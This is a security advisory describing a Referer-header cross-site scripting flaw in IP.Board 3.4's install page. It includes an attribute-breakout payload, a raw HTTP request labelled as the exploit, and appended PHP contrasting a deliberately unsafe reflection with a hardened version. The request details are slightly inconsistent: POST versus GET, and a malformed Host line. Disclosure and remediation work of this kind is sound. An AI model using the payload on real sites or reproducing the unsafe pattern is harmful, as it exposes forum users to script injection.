+--------------------------------------------------------------------
+
+ IP.Board 3.4 cross-site scripting in Referer header
+
+--------------------------------------------------------------------
+ vendor site........: http://www.invisionpower.com
+ Affected Software .: IP.Board 3.4
+ Class .............: XSS
+ Risk ..............: high
+ Found by ..........: Ahmed atif abdou [ OCERT Ambassador Program - Oman National CERT ]
+ Facebook .: https://www.facebook.com/runvirus
+ Contact ...........: stormhacker[at]hotmail[.]com
+--------------------------------------------------------------------

[X] Affected Products:
=========================
Tested on IP.Board 3.4.6 and IP.Board 3.4.4; may work under 3.4.

[X] About the application:
=========================
IP.Board is the leading solution for creating an engaging discussion forum on the web.

[X] Vulnerability Description:
===============================
The attack works under the above-mentioned conditions. A POST request must be sent to
http://path_forum/admin/install/index.php with the Referer header set as follows:

Referer: 1" onmouseover=prompt(947671) bad="

[X] Exploit :
===============================
GET /admin/install/index.php HTTP/1.1
Referer: 1" onmouseover=prompt(11111111) bad="
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Cookie:
Host: localhost/admin/install/index.php
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

[X] Video proof :
===============================
https://www.youtube.com/watch?v=WYm4C611eyU&feature=youtu.be

+--------------------------------------------------------------------
+
+ Greets:
+ || rUnViRuS || - || Providor ||
+-------------------------[ W D T ]----------------------------------
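
The shape of the Referer value above (`1"` closes a double-quoted attribute, `bad="` absorbs the original closing quote) indicates that the header is reflected into an HTML attribute without output encoding. The PHP below is an added example, not IP.Board source code and not from the advisory's author: it shows that pattern beside a hardened form that allow-lists the URL and encodes for the attribute context. The function names and the "Back" link are hypothetical.

```php
<?php
// Added illustration only; not IP.Board code. All names here are hypothetical.

// Unsafe pattern: the request header is copied into a double-quoted
// attribute as-is, so a '"' in the header ends the attribute early.
function render_back_link_unsafe(array $server): string
{
    $ref = $server['HTTP_REFERER'] ?? '';
    return '<a href="' . $ref . '">Back</a>';
}

// Hardened form: accept only an http(s) URL on our own host, then
// HTML-encode the value for the quoted-attribute context.
function render_back_link_safe(array $server, string $ownHost): string
{
    $ref   = $server['HTTP_REFERER'] ?? '';
    $parts = parse_url($ref);
    $ok = is_array($parts)
        && in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'], true)
        && strcasecmp($parts['host'] ?? '', $ownHost) === 0;
    if (!$ok) {
        $ref = '/';   // fall back to a fixed, known-good target
    }
    return '<a href="'
        . htmlspecialchars($ref, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '">Back</a>';
}

// Constructed inputs: the Referer value quoted in the advisory, and a
// benign same-host URL that itself contains characters needing encoding.
$advisory = ['HTTP_REFERER' => '1" onmouseover=prompt(947671) bad="'];
$benign   = ['HTTP_REFERER' => 'http://localhost/admin/index.php?a=1&b="x"'];

// Unsafe output: the header has become extra attributes on the element.
echo render_back_link_unsafe($advisory), "\n";

// Safe output: the advisory value fails the URL allow-list and is replaced.
echo render_back_link_safe($advisory, 'localhost'), "\n";

// Safe output: a legitimate Referer is kept, with & and " entity-encoded.
echo render_back_link_safe($benign, 'localhost'), "\n";
```

The allow-list and the encoding cover different cases: encoding alone stops the attribute breakout shown in the advisory, while the scheme and host check rejects values that are syntactically harmless in HTML but should not become a link target.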